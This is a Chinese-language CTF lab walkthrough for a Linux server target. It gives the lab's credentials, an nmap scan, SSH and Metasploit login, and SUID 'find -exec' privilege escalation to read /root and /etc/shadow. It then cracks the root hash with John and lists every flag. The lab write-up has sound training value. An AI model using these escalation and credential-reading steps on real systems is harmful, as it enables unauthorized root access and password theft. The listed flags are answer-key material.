Linux操作系统深入测试
任务环境说明:
- 服务器场景:Server2203(关闭链接)
- 用户名:hacker 密码:123456
1. 使用深入机对服务器信息收集,并将服务器中SSH服务端口号作为flag提交;
nmap -p- -sV 靶机IP # -p- 全端口,-sV 版本探测
flag: 2232/tcp
2. 使用深入机对服务器信息收集,并将服务器中主机名称作为flag提交;
ssh hacker@靶机IP -p 2232 # -p 指定端口,这里有点小坑,应该kali的ssh版本高,靶机的ssh版本低,导致的。
# 解法 1 ssh hacker@靶机IP -p 2232 -oKexAlgorithms=+diffie-hellman-group1-sha1 # -oKexAlgorithms=+diffie-hellman-group1-sha1 加上这个算,你可以点击下面的链接
# 解法 2 msfconsole # 我只说你可能不懂得 search ssh_login use 0 set RHOSTS 靶机IP set username hacker set password 123456 set RPORT 2232 # 注意一定要改端口,别忘记了 run sessions -l # 列出会话 sessions 1 # 连接第一个会话
uname -a # 查看系统基本信息
flag: 1doLfH31
3. 使用深入机对服务器信息收集,并将服务器中系统内核版本作为flag提交;
uname -a # 查看系统基本信息
flag: 2.6.18-8.el5
4. 使用深入机对服务器管理员提权,并将服务器中root目录下的文本内容作为flag提交;
find / -perm -u=s -type f 2>/dev/null
touch 1 # 创建个文件 ls # ls 查看文件 /usr/bin/find 1 -exec id \; # 提权 -exec 执行命令 \; 结束
/usr/bin/find 1 -exec ls /root \; /usr/bin/find 1 -exec cat /root/key.txt \;
flag: 84pPxbiP
5. 使用深入机对服务器管理员提权,并将服务器中root的密码作为flag提交;
/usr/bin/find 1 -exec cat /etc/shadow \;
vim hash # 把root信息行写入进去 cat hash # 查看是否写入成功 john hash # 破解密码
flag: darkman
- 使用深入机对服务器管理员提权,并将服务器中root目录下的图片内容作为flag提交。
su root # 切换root用户 id # 查看id是否为root cd # 不加参数会直接回到当前用户的家目录 pwd # 查看当前所在目录路径 python -V # 查看当前python版本 python -m SimpleHTTPServer 8080 # 开启HTTP服务,端口8080
访问的时候一定要指定8080端口
flag: HVcKG7tf